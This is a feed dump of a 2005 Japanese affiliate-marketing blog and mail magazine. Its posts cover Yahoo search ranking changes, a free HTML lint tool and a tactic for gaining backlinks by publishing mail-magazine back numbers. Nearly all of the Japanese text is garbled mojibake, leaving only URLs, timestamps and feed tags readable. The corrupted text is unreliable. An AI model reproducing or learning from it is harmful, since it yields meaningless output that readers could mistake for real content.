--------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - @“–ƒƒ‹ƒ}ƒK‚ֹ‚ז‚ט¶‚¶‚י‘¹QEƒgƒ‰ƒuƒ‹“™‚ֹ‚ֲ‚¢‚ִ׃”C‚ֽ•‰‚¢‚‚¹‚סB - @‚²ˆ׃©E‚²´‘z‚ֽinfo@1affliate.com‚‚ֵ‚¨ט‚¢’v‚µ‚‚·I - @“o˜^E‰נ‚ֽ‚±‚¿‚ח‚±‚ח@http://www.mag2.com/m/0000146544.htm - --------------------------------------------------------------------------- -Copyright(C) 2004-2005 All Rights Reserved. --------------------------------------------------------------------------- ]]> - - - - -ץƒGƒ“ƒWƒ“‘־פFYahoo!i2j - -2005-12-14T06:51:17Z -2005-12-14T06:50:32Z -tag:1affliate.com,2005://1.310 -2005-12-14T06:50:32Z -2005”N10‚©‚חƒ„ƒt[‚׃VƒXƒeƒ€‚נ•ֿX‚µ‚‚µ‚½B ¡‚‚ֵ‚ֽץ‚µ‚½ך‡AƒfƒBƒƒNƒgƒ‚ֹ“o˜^‚³‚ך‚ִ‚¢‚יƒTƒCƒg‚×^‚ֱז‚ֹ•\¦‚³‚ך‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚µ‚½‚×A•ֿXד‚ֽƒO[ƒOƒ‹‚ֶ“¯—l‚ֹAץƒƒ{ƒbƒg‚ּ•]‰¿‚×... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒAƒNƒZƒXƒAƒbƒv - -2005”N10‚©‚חƒ„ƒt[‚׃VƒXƒeƒ€‚נ•ֿX‚µ‚‚µ‚½B

    - -

    ¡‚‚ֵ‚ֽץ‚µ‚½ך‡AƒfƒBƒƒNƒgƒ‚ֹ“o˜^‚³‚ך‚ִ‚¢‚יƒTƒCƒg‚×^‚ֱז‚ֹ•\¦‚³‚ך‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚µ‚½‚×A•ֿXד‚ֽƒO[ƒOƒ‹‚ֶ“¯—l‚ֹAץƒƒ{ƒbƒg‚ּ•]‰¿‚ׂ‚¢ƒTƒCƒg‚‚ַדˆ•\¦‚³‚ך‚י‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½B
    -

    ]]> -¡‚‚ֵ‚ֶ”הr‚µ‚½ך‡AƒTƒCƒg–{—ˆ‚ְּ—ֽ‚׃‚ƒm‚נ¾‚₪‚ז‚₪‚ֹ‚ָ‚ֱ‚½‚ֶ‚¢‚¦‚‚·B

    - -


    -ֲl“I‚ֹ‚ֽA‚±‚ּƒVƒXƒeƒ€•ֿX‚ּ‰¶b‚נף‚¯‚ִ‚¢‚‚·B

    - -

    „‚׉^‰c‚µ‚ִ‚¢‚יƒƒCƒ“ƒTƒCƒg‚ּw‚©‚©‚ֱ‚ִ‚±‚¢I‰p‰ן˜bx‚ֽƒ„ƒt[‚ּƒfƒBƒƒNƒgƒ‚ֹ“o˜^‚³‚ך‚ִ‚ֽ‚¢‚½‚ּ‚ֵ‚·‚×A‚±‚ּƒfƒBƒƒNƒgƒ‚ֹ‚ֽ500ˆָד‚ּƒTƒCƒg‚דo˜^‚³‚ך‚ִ‚¢‚י‚ּ‚ֵAƒAƒNƒZƒXƒAƒbƒv‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚ֽA‰½‚ּˆ׃–¡‚א‚ ‚ט‚‚¹‚ס‚ֵ‚µ‚½B

    - -

    ‚ֶ‚±‚כ‚×AƒVƒXƒeƒ€•ֿXדAw‰p‰ן˜bx‚ֶ‚¢‚₪ƒL[ƒ[ƒh‚ֵ2ƒy[ƒW–‚ֹ•\¦‚³‚ך‚י‚ז‚₪‚ֹ‚ָ‚טAƒAƒNƒZƒX”‚א‘‚¦‚‚µ‚½B

    - -

    ƒTƒuƒy[ƒW”‚נ‘‚ג‚·A”םƒƒ“ƒN”‚נ‘‚ג‚·‚ֶ‚¢‚₪’n–¡‚ָ‘־ƒO[ƒOƒ‹‘־פ‚׃„ƒt[‚ֵ‚אˆ‚«‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚½‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    - -

    ‚»‚₪l‚¦‚י‚ֶA’n–¡‚ָ“w—ֽ‚נ‚µ‚ִ‚¢‚יl‚‚ַ•ס‚ם‚ך‚י‚ז‚₪‚ֹ‚ָ‚ט‚ֲ‚ֲ‚ ‚י‚ּ‚ֵA‚¢‚¢X‚©‚ָ‚ֶv‚¢‚‚·B

    - -

    •¶מ•ס‚נ‘‚ג‚µ‚ִA‘½‚­‚ּƒTƒCƒg‚©‚חƒƒ“ƒN‚נ‚µ‚ִ‚א‚ח‚₪B‚±‚ך‚ׂ±‚ך‚©‚חֵ‚‚ּƒ„ƒt[‘־פ‚ֶ‚¢‚ֱ‚ִװˆב‚¢‚ָ‚¢‚ֵ‚·B
    -

    ]]> -
    -
    - -•¶–@ƒ`ƒFƒbƒNƒc[ƒ‹ - -2005-12-11T02:01:00Z -2005-12-11T01:49:19Z -tag:1affliate.com,2005://1.309 -2005-12-11T01:49:19Z -HP‚נל¬‚·‚י‚ֶ‚«‚ֹ•K—v‚ֶ‚ָ‚יHTMLB HTML‚נ‘‚­‚ֶ‚«‚ֹ‚ֽA‚»‚ּ‚½‚‚ּƒ‹[ƒ‹•¶–@‚ׂ ‚ט‚‚·‚×A³‚µ‚¢•¶–@‚נg‚ֱ‚ִ‚¢‚יƒTƒCƒg‚‚ַAץƒGƒ“ƒWƒ“‚©‚ח•]‰¿‚³‚ך‚י‚ֶ‚¢‚₪˜b‚ׂ ‚ט‚‚·B ... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒIƒXƒXƒ‚ּƒc[ƒ‹ - -HP‚נל¬‚·‚י‚ֶ‚«‚ֹ•K—v‚ֶ‚ָ‚יHTMLB

    - -

    HTML‚נ‘‚­‚ֶ‚«‚ֹ‚ֽA‚»‚ּ‚½‚‚ּƒ‹[ƒ‹•¶–@‚ׂ ‚ט‚‚·‚×A³‚µ‚¢•¶–@‚נg‚ֱ‚ִ‚¢‚יƒTƒCƒg‚‚ַAץƒGƒ“ƒWƒ“‚©‚ח•]‰¿‚³‚ך‚י‚ֶ‚¢‚₪˜b‚ׂ ‚ט‚‚·B
    -

    ]]> -
    -‚»‚₪•·‚­‚ֶA©•ּׂƒTƒCƒg‚ֽH‚ֶ‹C‚ֹ‚ָ‚י‚ֶ‚±‚כ‚ֵ‚·B

    - -

    ‚»‚ך‚נ–³—¿‚ֵƒ`ƒFƒbƒN‚µ‚ִ‚­‚ך‚יƒc[ƒ‹‚ׂ±‚ך‚ֵ‚·B
    -http://openlab.ring.gr.jp/k16/htmllint/htmllint.html

    - -

    ƒ`ƒFƒbƒN‚µ‚½‚¢ƒTƒCƒg‚ּURL‚נ“—ֽ‚·‚ך‚־A“_”‚ֵ•\¦‚µ‚ִ‚­‚ך‚‚·B‚א‚¿‚כ‚ס“_”‚ׂ‚¢‚‚ַ‚¢‚¢‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚·B

    - -

    ‹C‚ֹ‚ָ‚יl‚ֽ‘‘¬‚µ‚ִ‚‚ִ‚ֽH

    - -


    -‚¿‚ָ‚‚ֹA„‚א©•ּׂƒTƒCƒg‚נƒ`ƒFƒbƒN‚µ‚ִ‚‚‚µ‚½‚×A‚½‚¢‚µ‚½“_”‚ֵ‚ֽ‚ ‚ט‚‚¹‚ס‚ֵ‚µ‚½BƒO[ƒOƒ‹‚ֵ‚אƒ„ƒt[‚ֵ‚א‚±‚ךˆָד–]‚‚ָ‚¢‚‚ַAדˆ•\¦‚³‚ך‚ִ‚¢‚י‚ּ‚ֵ‚·‚×EEE

    - -

    ‚ֲ‚¢‚ֵ‚ֹAדˆ•\¦‚³‚ך‚ִ‚¢‚י‘¼‚ּƒTƒCƒg‚אƒ`ƒFƒbƒN‚µ‚ִ‚‚‚µ‚½‚×A“_”‚×’ב‚¢ƒTƒCƒg‚א‹\‚ ‚ט‚‚µ‚½B

    - -

    ‚»‚ּ‹‰‚נ©‚יְ‚טA‚»‚ך‚‚ַˆצ‰ײW‚ׂ ‚י‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚א‚ָ‚³‚»‚₪‚ֵ‚·B

    - -

    ‚½‚¾A•¶–@“I‚ֹ³‚µ‚¢ƒTƒCƒg‚ּ‚‚₪‚×SEO‘־פדA—L—˜‚ֵ‚ ‚י‚±‚ֶ‚ֽװˆב‚¢‚ָ‚¢‚±‚ֶ‚ָ‚ּ‚ֵAˆך‰“ֹׂ“‚ך‚ִ‚¨‚¢‚½‚‚₪‚ׂ¢‚¢‚ֵ‚·B
    -

    ]]> -
    -
    - -No.027 - -2005-12-09T11:42:32Z -2005-12-09T11:34:50Z -tag:1affliate.com,2005://1.301 -2005-12-09T11:34:50Z -¡‚ֵ‚ֽg‚¢•¨‚ֹ‚ָ‚ח‚ָ‚­‚ָ‚ֱ‚½ƒAƒtƒBƒƒGƒCƒgƒmƒEƒnƒE - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒoƒbƒNƒiƒ“ƒo[ - - - - -@ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] - - vol.27 -@@@@@@@@@@@@@@@@@@@@@@@@@@“ַׂ”F‚‚®‚‚®10414l@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@“ֶ©”zM 1734l - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@s@¡‰ס‚ּ–@t -@ -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲw”­s‚×’x‚­‚ָ‚ֱ‚ִ\‚µ–ף‚ ‚ט‚‚¹‚סx -@y‚Qz¡T‚ּ¬קpw¡‚ֵ‚ֽg‚¢•¨‚ֹ‚ָ‚ח‚ָ‚­‚ָ‚ֱ‚½ƒAƒtƒBƒƒGƒCƒgƒmƒEƒnƒEx -@y‚Rz‚¨–נ—§‚¿מ•סwמ•סW‚ֹ–נ—§‚ֲƒtƒ[ƒ\ƒtƒgx -@y‚Sz•ׂWד‹L -@ -@‚»‚ך‚ֵ‚ֽA‚ַ‚₪‚¼II@ - -@–ˆ“ת‚ּƒAƒtƒBƒƒGƒCƒg“‚נצJ‚µ‚ִ‚¢‚‚·II -@http://blog.livedoor.jp/affiliatemaseter/ -@w–w‚¹I300–‰~IIƒX[ƒp[ƒAƒtƒBƒƒGƒCƒ^[‚ײ‚ּ“¹x - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲ -@@@@@@w”­s‚×’x‚­‚ָ‚ֱ‚ִ\‚µ–ף‚ ‚ט‚‚¹‚סx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -¡T‚ֽƒƒ‹ƒ}ƒK‚ּ”­s‚×’x‚ך‚ִ‚µ‚‚¢‚‚µ‚½B -—j“ת‚©‚חנ“ת‚‚ֵA•‰×AR‚ֹ‘״‚µ‚ִ‚¢‚ִAƒƒ‹ƒ}ƒK‚נ”­s -‚·‚יװ‚ֶׂ‚ך‚‚¹‚ס‚ֵ‚µ‚½B - -­‚µ’x‚ך‚ִ‚ּ”­s‚ֹ‚ָ‚ט‚‚·‚×A‚ז‚כ‚µ‚­‚¨ט‚¢’v‚µ‚‚·B - -•‰×ERA‚ַ‚¿‚ח‚א‚ז‚©‚ֱ‚½‚ֵ‚·B•‰×ˆ‹C‚ׂ ‚י³‹C‚ָ’¬A -R©‘R–L‚©‚ָ‚ּ‚ס‚ׁ‚ט‚ָ’¬B‚±‚ס‚ָƒCƒ[ƒW‚ֵ‚·B‚¢‚¢‹C•ד]·‚ֹ -‚ָ‚ט‚‚µ‚½B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Qz¡T‚ּ¬קp -@@@@@@w¡‚ֵ‚ֽg‚¢•¨‚ֹ‚ָ‚ח‚ָ‚­‚ָ‚ֱ‚½ƒAƒtƒBƒƒGƒCƒgƒmƒEƒnƒEx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -¡‰ס‚ֽ­‚µ•ֿ‚ם‚ֱ‚½‹“_‚©‚ח‚¨˜b‚µ‚‚·B - -w‚ָ‚÷Ag‚¢•¨‚ֹ‚ָ‚ח‚ָ‚¢ƒmƒEƒnƒE‚נ׀‰מ‚·‚י‚ּHx - -‚±‚ס‚ָ‚׃‚₪‚ֹv‚ם‚ך‚½‚©‚א‚µ‚ך‚‚¹‚ס‚×AƒLƒ`ƒ“‚ֶˆ׃–¡‚ׂ ‚ט‚‚·‚ּ‚ֵ -‚²ˆְS‚­‚¾‚³‚¢B - -‚‚¸‚ֽ‚»‚ּƒmƒEƒnƒE‚©‚ח‚¨“`‚¦‚µ‚ִA‚ֹA‚»‚ּƒmƒEƒnƒE‚נ׀‰מ‚µ‚½ -^ˆ׃‚נ‚¨˜b‚µ‚‚·‚ֻB - - -g‚¢•¨‚ֹ‚ָ‚ח‚ָ‚­‚ָ‚ֱ‚½ƒmƒEƒnƒE‚ֶ‚¢‚₪‚ּ‚ֽAץƒGƒ“ƒWƒ“‘־פ‚ֹײ‚·‚י -‚א‚ּ‚ֵ‚·B - -¡‚©‚חA2”N‚®‚ח‚¢‘O‚ּ‚±‚ֶ‚ֵ‚·‚×A”םƒƒ“ƒN”©•ּׂƒTƒCƒg‚ֹ“\‚ח‚ך‚ִ‚¢‚י -ƒƒ“ƒN‚ּ”‚נ‘‚ג‚·‚±‚ֶ‚׈ך”װ‚ּץƒGƒ“ƒWƒ“‘־פ‚ֹ‚ָ‚י‚ֶ‚¢‚₪‚±‚ֶ‚נ„‚ֽ -’m‚ט‚‚µ‚½B - - -‚»‚±‚ֵA‰½‚©ר‰“I‚ָ‚ג‚ט•‚ָׂ‚¢‚©‚ָ‚ֶv‚¢AFX‚ֶl‚¦‚½––‚ֹ‚½‚ַ‚ט -’…‚¢‚½‚ּ‚׃ƒ‹ƒ}ƒK‚נg‚₪‚ג‚ט•‚ֵ‚·B - -d‘g‚‚ָֽ’P‚ֵ‚·B - -ƒƒ‹ƒ}ƒK‚נ”­s‚µ‚ִA‚»‚ּ’†‚ֵA©•ּׂƒTƒCƒg‚ײ‚ּURL‚נ‹L‚µ‚ִ‚¨‚«‚‚·B -‚±‚ס‚ָ´‚¶‚ֵ‚·« - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ --------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg -@@@@@@@@@http://www.1affliate.com - - -‚±‚₪‚¢‚₪‚ּ‚ֱ‚ִ—ַ‚­‚ ‚ט‚‚·‚ז‚ֻB - -‚»‚µ‚ִAƒƒ‹ƒ}ƒK‚ּƒoƒbƒNƒiƒ“ƒo[‚נצJ‚·‚י‚ז‚₪‚ֹ’ט‚µ‚‚µ‚½B - -‚»‚₪‚·‚י‚ֶAץƒGƒ“ƒWƒ“‚׃oƒbƒNƒiƒ“ƒo[‚נE‚ֱ‚½‚ֶ‚«‚ֹA‚»‚±‚ֹ‹L‚µ‚ִ -‚ ‚יURL‚נƒƒ“ƒN‚ֶ‚¢‚₪‚׃‚₪‚ֹ‚‚ָ‚µ‚ִ‚­‚ך‚‚·B‚»‚ּ“_‚ֵAƒTƒCƒg‚ּ”םƒƒ“ƒN -”‚ב‚¦‚י‚ֶ‚¢‚₪d‘g‚‚ֵ‚·B - -i‚±‚ּ‚ײ‚ס‚ּ˜b‚ׂם‚©‚ח‚ָ‚¢l‚ֽAץƒGƒ“ƒWƒ“‘־פײ˜A‚ּ–{‚גƒTƒCƒg‚נ“ַ‚ס‚ֵ -@‚‚ִ‚­‚¾‚³‚¢Bj - - -‚ ‚ֶ‚ֽ—ֽ‹Z‚ֵ‚·B - -ƒƒ‹ƒ}ƒK‚ּ”zMƒXƒ^ƒ“ƒh‚ֽ‚‚®‚‚®ˆָO‚ֹ‚אFX‚ ‚י‚ּ‚ֵA‚»‚₪‚¢‚ֱ‚½”zMƒXƒ^ƒ“ƒh -‚©‚ח‚א”­s‚·‚ך‚־A‚»‚ּ•׃oƒbƒNƒiƒ“ƒo[‚א‘‚¦‚יB‚·‚ָ‚ם‚¿A”םƒƒ“ƒN”‚ב‚¦‚י -‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - -„‚ּך‡‚ֽA“–‚V‚ֲ‚ּ”zMƒXƒ^ƒ“ƒh‚©‚ח”­s‚µ‚ִ‚¢‚‚µ‚½B -”םƒƒ“ƒN”‚×1“ת‚V‚ֲ‘‚¦‚יvZ‚ֵ‚·B - -‚±‚ך‚נ1“ת1‰סA“ת§‚ֵ”­s‚·‚ך‚־7‚˜30210‘‚¦‚‚·B - -‚±‚ך‚ֽƒƒ‹ƒ}ƒK‚נ1”­s‚µ‚ִ‚¢‚יך‡‚ּvZ‚ָ‚ּ‚ֵA‚½‚ֶ‚¦‚־5”­s‚·‚ך‚־ -”םƒƒ“ƒN”‚א5”{A‚ֲ‚‚ט1000‚נ’´‚¦‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - -‚±‚ך‚¾‚¯‚ּ”‚ֹ‚ָ‚ך‚־A‚ַ‚ס‚ָƒTƒCƒg‚ֵ‚א™‚ֵ‚אדˆ•\¦‚³‚ך‚‚·B -ְA„‚ּƒTƒCƒg‚אA‚±‚ך‚ֵƒJƒ“ƒ^ƒ“‚ֹדˆ•\¦‚³‚ך‚‚µ‚½B - -‚±‚ּƒmƒEƒnƒE‚נְs‚µ‚ִ‚©‚חA1ƒ–‚א‚©‚©‚ח‚ָ‚©‚ֱ‚½‚ֵ‚·B - -ƒƒ‹ƒ}ƒK‚נ”­s‚·‚י‚ֶ‚¢‚₪‚ֶ‘ו•ֿ‚ָ‚ז‚₪‚ֹv‚ם‚ך‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×A’†g‚ָ‚ַ‚ֽ -‚ַ‚₪‚ֵ‚א‚ז‚­AURL‚³‚¦‹L‚µ‚ִ‚ ‚ך‚־‚ז‚©‚ֱ‚½‚ּ‚ֵy‚ֵ‚·B - -“–‚ֽAi¾‚ג–¼¾‚נ׀‰מ‚·‚י‚ז‚₪‚ָƒƒ‹ƒ}ƒK‚נ”­s‚µ‚ִ‚¢‚‚µ‚½B -i‚±‚ך‚¾‚ֶ‘S‘RAטװ‚ׂ©‚©‚ח‚ָ‚¢‚ס‚ֵ‚·Bj - - -¡‚ֽץƒGƒ“ƒWƒ“‚ׂ±‚₪‚¢‚ֱ‚½ƒƒ“ƒN‚נd—v‹‚µ‚ָ‚­‚ָ‚ֱ‚½‚ּ‚ֵA -‚±‚ּƒmƒEƒnƒE‚ֽ’—p‚µ‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B - - -‚ֵ‚א“–A‚±‚ּƒmƒEƒnƒE‚נ’m‚ֱ‚ִ‚¢‚½l‚ֽ‹­‚©‚ֱ‚½‚ֶv‚¢‚‚·B - - -‚³‚ִA‚±‚ּƒmƒEƒnƒE‚נ׀‰מ‚µ‚½——R‚ֵ‚·‚×AƒmƒEƒnƒE©‘ּ‚ֽ‚ַ‚₪‚ֵ‚א‚¢‚¢‚±‚ֶ -‚ֵ‚·B‚»‚ך‚ז‚ט‚אAƒmƒEƒnƒE‚ֹ‚ ‚י^ˆ׃‚נ©”²‚¯‚י‚©‚ַ‚₪‚©‚×A¬ק‚ֶ -¸”s‚ּ•ׂ©‚ך–‚ֹ‚ָ‚י‚ֶ‚¢‚₪‚±‚ֶB - -‚±‚ּ‚±‚ֶ‚נ‚¨“`‚¦‚µ‚½‚­‚ִA‚±‚ּ˜b‚נ‚³‚¹‚ִ’¸‚«‚‚µ‚½B - - -‚±‚ּƒmƒEƒnƒE‚ּƒ|ƒCƒ“ƒg‚ֽAƒƒ‹ƒ}ƒK‚נg‚ֱ‚ִEEE‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚ֽ -‚ָ‚­A”םƒƒ“ƒN”‚נ‘‚ג‚·‚±‚ֶ‚×d—v‚ֵA‚»‚ּ‚½‚‚ּר—¦“I‚ָ‚ג‚ט‚©‚½‚נ -l‚¦‚ך‚־‚¢‚¢‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B - -‚»‚ך‚³‚¦•ׂ©‚ך‚־Aפ‚ח‚ֵ‚א‰—p‚ֵ‚«‚‚·B -ƒƒ‹ƒ}ƒK‚׃_ƒ‚ָ‚ח‚־EEE‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B - -×–{“I‚ָ•”•ׂ³‚¦—‰נ‚µ‚ִ‚¢‚ך‚־A‚»‚ך‚נ‰—p‚·‚י‚ג‚ט•‚ֽ -פ‚ח‚ֵ‚אv‚¢‚ֲ‚«‚‚·B - - -‚ֵ‚אA‚±‚ך‚נƒƒ‹ƒ}ƒK”­s”םƒƒ“ƒN”ƒAƒbƒv‚ֶ‚¢‚₪‚±‚ֶ‚ֵ’Z—“I‚ֹo‚¦‚ִ -I‚ם‚ט‚ֶ‚¢‚₪l‚ֽA‰—p‚נ—˜‚©‚¹‚י‚±‚ֶ‚ֵׂ‚«‚‚¹‚סB‚ֵ‚·‚©‚חA‚»‚ּƒmƒEƒnƒE‚× -g‚¦‚ָ‚­‚ָ‚ֱ‚½“_‚ֵI‚ם‚ט‚ֵ‚·B - -‚±‚₪‚¢‚₪ƒ^ƒCƒv‚ּl‚ֽ”¼‰i‹v“I‚ֹƒmƒEƒnƒE‚נ’ַ‚¢‚©‚¯‚י‚±‚ֶ‚ֹ‚ָ‚י‚ֶv‚¢‚‚·B - - -ƒmƒEƒnƒE‚נ’m‚ֱ‚½‚ֶ‚«Aw‚ָ‚÷A‚»‚ּƒmƒEƒnƒE‚ֽר‰“I‚ָ‚ּ‚©Hx‚ֶ‚¢‚₪ -‚»‚ּ——R‚נl‚¦‚י•ָ‚נ‚ֲ‚¯‚ִ‚­‚¾‚³‚¢B - -‚»‚ך‚ֵׂ‚«‚ך‚־A100‚ּƒmƒEƒnƒE‚נ’m‚ֱ‚½‚ֶ‚«A‚»‚ך‚נ200‚ֹ‚א300‚ֹ‚א -o—ˆ‚‚·B‚±‚₪‚ג‚ֱ‚ִ©•×—¬‚ּƒmƒEƒnƒE‚נל‚ך‚יl‚׬ק‚ֵ‚«‚יl‚ֵ‚·B - -‹t‚ֹA‚±‚ך‚×o—ˆ‚ָ‚¯‚ך‚־A¬ק‚·‚י‚±‚ֶ‚ֽ“ן‚µ‚¢‚ֶv‚¢‚‚·B - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡“ת–{‰I@¬‰•״^‚ּƒAƒtƒBƒƒGƒCƒg’M‹³ˆח -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚×ִC‚נ‚µ‚ִ‚¢‚יֲ•ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒO•t‚«‚ּ’Muְ‚ֵ‚·B -ףuתװi6ƒ–j“א‚ֹƒAƒtƒBƒƒGƒCƒg“‚×10–‰~‚נ’´‚¦‚י -ƒTƒCƒg‚נ\’z‚ֵ‚«‚ָ‚©‚ֱ‚½ך‡A6ƒ–װAuְ‚נ–³—¿‚ֵ‰„’· -‚ֵ‚«‚‚·B - -ְ’ט‚P‚O–¼‚ֵ•וW’†‚ֵ‚µ‚½‚×A•וWl”‚נ‘‚ג‚µ‚ִ‚‚µ‚¢‚ֶ‚¢‚₪÷‚ֹ -“‚¦‚ִ’טˆץ‚נ‚R‚O–¼‚ֹg‘ו‚µ‚‚µ‚½B - -ƒ€[ƒoƒuƒ‹ƒ^ƒCƒv‚ּ’u‚גƒeƒ“ƒvƒ[ƒgƒJƒXƒ^ƒ}ƒCƒY‚ּ–³—¿ƒTƒ|[ƒg‚א -ף‚¯‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚‚µ‚½B‚±‚ך‚ֵA‚g‚o‚ּל‚ט•‚ׂם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ -•‚אˆְS‚µ‚ִAƒRƒ“ƒeƒ“ƒcל¬‚ֹW’†‚ֵ‚«‚‚·B - -http://www.tsurupea.com/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Rz‚¨–נ—§‚¿מ•ס -@@@@wמ•סW‚ֹ–נ—§‚ֲƒtƒ[ƒ\ƒtƒgx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒAƒtƒBƒƒGƒCƒg‚ֶ‚¢‚₪‚ּ‚ֽAFX‚ָˆ׃–¡‚ֵ’m¯W–ס^‚ּƒrƒWƒlƒX‚ָ‚ּ‚ֵ -מ•סW‚ֽ”סם‚ֹd—v‚ֵ‚·B“ֱ‚ֹƒlƒbƒg‚נ‚ַ‚ך‚¾‚¯ˆµ‚¦‚י‚ּ‚©‚ֶ‚¢‚₪‚ּ‚× -ƒ|ƒCƒ“ƒg‚ֹ‚ָ‚ֱ‚ִ‚«‚‚·B - -„‚ֽ’²‚׳•¨‚נ‚·‚י‚ֶ‚«A’m¯‚נ“¾‚י‚ֶ‚«‚ֹ‚ֽA‚»‚ּ•×–ל‚ֹײ‚·‚יƒTƒCƒg‚נ -100ֲ’Pˆ‚ֵƒ`ƒFƒbƒN‚µ‚‚·B - -‚»‚ּ‚ֶ‚«‚ֹ–נ—§‚ֲ‚ּ‚×w†x‚ֶ‚¢‚₪ƒtƒ[ƒ\ƒtƒg‚ֵ‚·B -ƒlƒbƒg‚ּ‰ז–‚נ‚»‚ּ‚‚ƒRƒs[‚µ‚ִ•‘¶‚ֵ‚«‚‚·Bƒe[ƒ}‚²‚ֶ‚ֹ -•‘¶ƒtƒHƒ‹ƒ_‚נ’ט‚ֵ‚«‚י‚ּ‚ֵAמ•סƒ\[ƒX‚ּ®—‚ֹ‚ֶ‚ִ‚א•ײ—˜‚ֵ‚·B - -‘½•×A‚±‚ּא–¾‚¾‚¯‚ֽ‚ם‚©‚ט‚ֳ‚ח‚¢‚ֶv‚₪‚ּ‚ֵAƒ_ƒEƒ“ƒ[ƒh‚µ‚ִ -g‚ֱ‚ִ‚‚ִ‚­‚¾‚³‚¢BƒXƒSƒC•ײ—˜‚ֵ‚·‚זB - -http://rakusai.org/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡•ׂWד‹L@w©‘R‚ֱ‚ִ‚¢‚¢‚©‚אx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -2“תװAR§‚ּג‘‚ֶ‚¢‚₪‚ֶ‚±‚כ‚ֹZ‚ס‚ֵ‚¢‚י—F’B‚ּ‰ֶ‚ֹ—V‚ׁ‚ֹ -s‚ֱ‚ִ‚¢‚‚µ‚½B - -30•ב–‚ך‚־C‚ֹ‚א‚¢‚¯‚י‚µA—־–L‚©‚ָR‚ֹ‚א‚¢‚¯‚י‚ֶ‚¢‚₪©‘R–L‚©‚ָ -ך‚ֵ‚·B - -‚ֶ‚ִ‚אA‚ּ‚ַ‚©‚ָך‚ֵA‚±‚ס‚ָ‚ֶ‚±‚כ‚ֹZ‚‚ָ‚ׂחƒAƒtƒBƒƒGƒCƒg -‚·‚י‚ּ‚א‚¢‚¢‚©‚ָ‚ֶv‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B - -ך‚נ‘I‚־‚¸‚ֹ‚ֵ‚«‚י‚ּ‚׃AƒtƒBƒƒGƒCƒg‚ּ‚¢‚¢‚ֶ‚±‚כ‚ָ‚ּ‚ֵ -‚±‚₪‚¢‚ֱ‚½ƒƒƒbƒg‚ֽˆ‚©‚µ‚½‚¢‚ֵ‚·B - - - -„‚×”­s‚µ‚ִ‚¢‚י‚‚©‚ּƒƒ‹ƒ}ƒK‚ֵ‚·B - -@w‚א‚₪ˆך“xn‚‚ז‚₪I‚P“ת‚T•ׂ©‚ח‚ּ‰p‰ן˜bx -@http://www.mag2.com/m/0000103697.htm - -@wD‚«‚ָ‚±‚ֶ‚µ‚ִy‚µ‚­¶‚«‚ז‚₪‚זx -@http://www.mag2.com/m/0000112428.htm - - -@‚²´‘zA‚²¿–ג‚ֽ‚±‚¿‚ח‚‚ֵ‚ַ‚₪‚¼B 